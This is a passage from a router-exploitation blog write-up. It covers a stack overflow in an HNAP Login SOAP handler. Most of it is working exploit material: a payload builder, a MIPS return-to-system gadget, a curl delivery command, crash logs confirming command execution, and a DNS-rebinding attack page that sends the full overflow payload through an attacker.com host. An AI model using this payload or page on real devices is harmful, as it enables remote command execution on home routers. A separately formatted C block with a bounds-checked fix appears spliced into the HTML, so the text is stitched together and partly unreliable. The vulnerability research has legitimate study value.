style="box-sizing: border-box;">soap_body</span> = <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>request</Action><Username>Admin</Username><LoginPassword>"</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-variable" style="box-sizing: border-box;">payload</span> <span class="cm-operator" style="box-sizing: border-box;">+</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"</LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-builtin" style="box-sizing: border-box; color: #f3b3f8;">print</span>(<span class="cm-variable" style="box-sizing: border-box;">soap_body</span>)</span></span></pre></div><div><span style="font-family: helvetica;"><br /></span></div><div><p cid="n87" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin-bottom: 1.5rem; margin-top: 0px; overflow-wrap: break-word; position: relative;"><span style="font-family: helvetica;">The following gadget was found in the libc address and used to perform a return-to-system:<br /><br /></span></p><pre cid="n86" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="python" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 
30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-comment" style="box-sizing: border-box; color: #da924a;">0x00042e08 : sw $v0, 0xa8($sp) ; addiu $a0, $sp, 0xb8 ; lw $t9, 0x24($sp) ; jalr $t9 ; move $a1, $s6</span></span></span></pre><span style="font-family: helvetica;"><span class="md-softbreak" md-inline="softbreak" style="box-sizing: border-box;">
</span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The gadget allows jumping to the next instruction through </span><span class="md-pair-s" md-inline="code" spellcheck="false" style="box-sizing: border-box;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; font-size: 0.875rem; padding: 2px 5px; vertical-align: initial;"><span style="color: #e06666;">jalr $t9</span></code></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> and </span><span class="md-pair-s" md-inline="code" spellcheck="false" style="box-sizing: border-box;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; font-size: 0.875rem; padding: 2px 5px; vertical-align: initial;"><span style="color: #e06666;">lw $t9</span>, <span style="color: #e06666;">0x24($sp)</span></code></span><span class="md-plain" md-inline="plain"><span style="box-sizing: border-box;">; so we put the address of <i>system()</i> 36 bytes after the address currently held in $sp. 
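Stepping back to the root cause: the overflow exists because the decompiled tag-extraction routine shown earlier copies the value between the login tags without ever comparing its length to the destination. The block below is an added example, not the vendor's or the post's code, giving a bounded version of that routine in C; the function names, the 128-byte DEST_SIZE (mirroring the caller buffer described above) and the constructed HNAP bodies are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the vendor's code: a bounded version of the
 * <Tag>value</Tag> extraction routine decompiled above. DEST_SIZE mirrors
 * the 128-byte caller buffer described in the post; all names are assumed. */
#define DEST_SIZE 128

/* Copy the text between <tag> and </tag> from input into dst.
 * Returns 0 on success, -1 if the tag is absent or unterminated,
 * -2 if the value would not fit in dst (nothing is written in that case). */
int extract_tag_value(const char *input, const char *tag,
                      char *dst, size_t dst_size)
{
    char open_tag[64];
    char close_tag[64];
    const char *start;
    const char *end;
    size_t len;
    int n;

    if (input == NULL || tag == NULL || dst == NULL || dst_size == 0)
        return -1;

    /* The decompiled routine built both markers with sprintf() into fixed
     * stack arrays; snprintf() plus a truncation check bounds that step. */
    n = snprintf(open_tag, sizeof open_tag, "<%s>", tag);
    if (n < 0 || (size_t)n >= sizeof open_tag)
        return -1;
    n = snprintf(close_tag, sizeof close_tag, "</%s>", tag);
    if (n < 0 || (size_t)n >= sizeof close_tag)
        return -1;

    start = strstr(input, open_tag);
    if (start == NULL)
        return -1;
    start += strlen(open_tag);

    end = strstr(start, close_tag);
    if (end == NULL)
        return -1;
    len = (size_t)(end - start);

    /* The check the decompiled code lacks: compare the value length with the
     * destination capacity before copying, so an oversized <LoginPassword>
     * is rejected instead of running past var_overflow / destination_buffer. */
    if (len >= dst_size)
        return -2;

    memcpy(dst, start, len);
    dst[len] = '\0';
    return 0;
}

/* Constructed sample: a well-formed HNAP Login body with a short password.
 * Returns 1 when the extracted value is exactly "s3cret". */
int demo_short_password(void)
{
    char dst[DEST_SIZE];
    const char *body =
        "<Login xmlns=\"http://purenetworks.com/HNAP1/\">"
        "<Action>request</Action><Username>Admin</Username>"
        "<LoginPassword>s3cret</LoginPassword><Captcha></Captcha></Login>";

    if (extract_tag_value(body, "LoginPassword", dst, sizeof dst) != 0)
        return 0;
    return strcmp(dst, "s3cret") == 0;
}

/* Constructed sample: a LoginPassword value of value_len 'A' bytes (e.g. the
 * 1028-byte filler of the post's payload). Returns the extractor's code. */
int demo_password_of_length(size_t value_len)
{
    char dst[DEST_SIZE];
    char body[4096];
    size_t prefix;

    if (value_len > sizeof body - 64)
        return -1;
    strcpy(body, "<Login><LoginPassword>");
    prefix = strlen(body);
    memset(body + prefix, 'A', value_len);
    strcpy(body + prefix + value_len, "</LoginPassword></Login>");
    return extract_tag_value(body, "LoginPassword", dst, sizeof dst);
}

/* Constructed sample: a value with no closing tag is rejected rather than
 * read up to whatever happens to follow in the request. */
int demo_unterminated_tag(void)
{
    char dst[DEST_SIZE];
    return extract_tag_value("<Login><LoginPassword>abc</Login>",
                             "LoginPassword", dst, sizeof dst);
}

int main(void)
{
    printf("short password:     %d\n", demo_short_password());         /* 1 */
    printf("127-byte password:  %d\n", demo_password_of_length(127));  /* 0 */
    printf("128-byte password:  %d\n", demo_password_of_length(128));  /* -2 */
    printf("1028-byte password: %d\n", demo_password_of_length(1028)); /* -2 */
    printf("unterminated tag:   %d\n", demo_unterminated_tag());       /* -1 */
    return 0;
}
```

The 127/128 pair shows the exact boundary: the value plus its terminator must fit in the 128-byte destination, which is precisely what the original strlcpy/strcpy chain never verified.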
</span></span></span></div><div><span style="font-family: helvetica;"><span class="md-plain" md-inline="plain"><span style="box-sizing: border-box;"><br /></span></span></span></div><div><span style="font-family: helvetica;"><span class="md-plain" md-inline="plain"><span style="box-sizing: border-box;">The argument of </span></span><span style="box-sizing: border-box;"><i>system()</i>, was prev</span><span class="md-plain" md-inline="plain"><span style="box-sizing: border-box;">iously controlled thanks to </span></span><span class="md-pair-s" md-inline="code" spellcheck="false" style="box-sizing: border-box;"><code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; box-sizing: border-box; font-size: 0.875rem; padding: 2px 5px; vertical-align: initial;"><span style="color: #e06666;">addiu $a0, $sp, 0xb8</span></code></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">, which points to the stack location that contains the command to execute.</span></span><p></p><span style="font-family: helvetica;">Once adjusted the <i>libc</i> base address according to the system-mode, we could test the exploit by using <i>curl</i> (the body file contains the output of the python exploit):</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n89" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="bash" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><span class="cm-def" style="box-sizing: border-box; color: 
#8d8df0;">$ curl</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-X</span> POST <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-d</span> @body http://192.168.0.1/HNAP1/ <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-H</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'SOAPAction: http://purenetworks.com/HNAP1/Login'</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-H</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'HNAP_AUTH: 7A6EA9269CBB71629F4EF2926343C7A1 1583173034'</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-H</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'Content-Type: text/xml; charset=utf-8'</span></span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><br /><title>500 Internal Server Error</title></span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><h1>500 Internal Server Error</h1></span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><span style="font-family: helvetica;"><br /></span><div style="text-align: left;"><span style="font-family: helvetica;">The "touch /tmp/minded" command was successfully executed, as shown by this file being written in the "/tmp" directory of the emulated firmware. </span></div><div style="text-align: left;"><span style="font-family: helvetica;"><br /></span></div><div style="text-align: left;"><span style="font-family: helvetica;">The following output comes from <i>FAT</i> and shows the emulated router console reporting the <i>SIGSEGV</i> crash caused by the running exploit.
</span></div></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n91" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"># [ 5278.120000] do_page_fault() #2: sending SIGSEGV to hnap for invalid read access from</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] 68202f90 (epc == 2ab26e20, ra == 2ab26e1c)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] Cpu 0</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] $ 0 : 00000000 1000a400 68202f74 00000001</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] $ 4 : 2ab64000 7f80be50 00000000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.120000] $ 8 : 00000000 80104960 8f06cc98 0000000a</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $12 : 00000008 811e41c0 00000000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $16 : 7f80cd88 2ab44000 004013b8 0049e444</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $20 : 00487ec0 0049e88c 004a0000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $24 : 8f3cc4f0 2ab1db80 </span><br /><span role="presentation" 
style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] $28 : 2ab65400 7f80bea0 41414141 2ab26e1c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Hi : 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Lo : 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] epc : 2ab26e20 0x2ab26e20</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Not tainted</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] ra : 2ab26e1c 0x2ab26e1c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Status: 0000a413 USER EXL IE </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Cause : 10800008</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] BadVA : 68202f90</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] PrId : 00019300 (MIPS 24Kc)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Modules linked in:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Process hnap (pid: 20107, threadinfo=8f1b6000, task=8f2bd6e0, tls=2aab7440)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] Stack : 42424242 43434343 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.124000] 43434343 2ab46104 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: 
border-box; padding-right: 0.1px;">[ 5278.128000] 43434343 43434343 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] 43434343 43434343 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] 43434343 43434343 43434343 43434343 43434343 43434343 43434343 43434343</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] ...</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] Call Trace:</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] Code: 0320f809 02c02821 8fa200bc <8c59001c> 13200004 8fbc0018 0320f809 27a400b8 8fbc0018 </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] hnap/20107: potentially unexpected fatal signal 11.</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] Cpu 0</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.128000] $ 0 : 00000000 1000a400 68202f74 00000001</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $ 4 : 2ab64000 7f80be50 00000000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $ 8 : 00000000 80104960 8f06cc98 0000000a</span><br /><span role="presentation" 
style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $12 : 00000008 811e41c0 00000000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $16 : 7f80cd88 2ab44000 004013b8 0049e444</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $20 : 00487ec0 0049e88c 004a0000 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $24 : 8f3cc4f0 2ab1db80 </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] $28 : 2ab65400 7f80bea0 41414141 2ab26e1c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Hi : 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Lo : 00000000</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] epc : 2ab26e20 0x2ab26e20</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Not tainted</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] ra : 2ab26e1c 0x2ab26e1c</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Status: 0000a413 USER EXL IE </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] Cause : 10800008</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] BadVA : 68202f90</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[ 5278.132000] PrId : 00019300 (MIPS 24Kc)</span></span></pre><div><span style="font-family: helvetica;">Below is the proof that the <i>touch</i> command was executed (the <i>minded</i>
file is listed in /tmp).</span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;"><pre cid="n91" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"># ls /tmp/</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span style="color: #b8bfc6;">server.key wburfe wifi0.caldata </span><span style="color: #04ff00;"><b><i>minded</i></b></span></span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;">server.crt hapfie wifi1.caldata</span><br /><span role="presentation" style="box-sizing: border-box; color: #b8bfc6; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></span></pre><div><br /></div></span></div><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; letter-spacing: -1px; line-height: 1.5rem; margin: 0px 0px 1.5rem; orphans: 4; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: pre-wrap;"><span style="font-family: helvetica;">Remote Command Execution through DNS Rebinding attack</span></h4><span style="font-family: helvetica;">It was then possible to embed the generated payload inside an <i>xhr</i> SOAP request in the <i>DNS Rebinding</i> HTML attack page we used in the </span><a href="https://blog.mindedsecurity.com/2021/02/journey-into-beauty-of-dnsrebinding.html" style="font-family: helvetica;" target="_blank">first</a><span style="font-family: helvetica;"> part:</span></div><div><span
style="font-family: helvetica;"><br /></span><pre cid="n93" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="html" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">src</span>=<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"jquery.min.js"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: 
border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">exploit</span>()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> {</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">xhr</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">new</span> <span class="cm-variable" style="box-sizing: border-box;">XMLHttpRequest</span>();</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">open</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"POST"</span>, <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"http:\/\/127-0-0-1.192-168-0-1.attacker.com\/HNAP1\/"</span>, <span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">true</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">setRequestHeader</span>(<span class="cm-string" 
style="box-sizing: border-box; color: #d26b6b;">"Accept"</span>, <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"*\/*"</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">setRequestHeader</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"Content-Type"</span>, <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"text\/xml; charset=utf-8"</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">setRequestHeader</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"SOAPAction"</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"http:\/\/purenetworks.com\/HNAP1\/Login"</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">setRequestHeader</span>(<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"HNAP_AUTH"</span>,<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"7A6EA9269CBB71629F4EF2926343C7A1 1583173034"</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">xhr</span>.<span class="cm-property" style="box-sizing: border-box;">withCredentials</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #84b6cb;">true</span>;</span><br 
/><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">body</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"\x3c?xml version=\"1.0\" encoding=\"utf-8\"?\x3e\x3csoap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"\x3e\x3csoap:Body\x3e\x3cLogin xmlns=\"http://purenetworks.com/HNAP1/\"\x3e\x3cAction\x3erequest\x3c/Action\x3e\x3cUsername\x3eAdmin\x3c/Username\x3e\x3cLoginPassword\x3eAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*\xb2n\x08BBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC*\xb4a\x04CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCtouch \/tmp\/testJS\x3c/LoginPassword\x3e\x3cCaptcha\x3e\x3c/Captcha\x3e\x3c/Login\x3e\x3c/soap:Body\x3e\x3c/soap:Envelope\x3e"</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">aBody</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">new</span> <span class="cm-variable" style="box-sizing: border-box;">Uint8Array</span>(<span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">body</span>.<span class="cm-property" style="box-sizing: border-box;">length</span>);</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">for</span> (<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">i</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span>; <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">i</span> <span class="cm-operator" style="box-sizing: border-box;"><</span> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">aBody</span>.<span class="cm-property" style="box-sizing: border-box;">length</span>; <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">i</span><span class="cm-operator" style="box-sizing: border-box;">++</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-2" style="box-sizing: border-box; color: #9fbad5;">aBody</span>[<span class="cm-variable-2" style="box-sizing: border-box; color: 
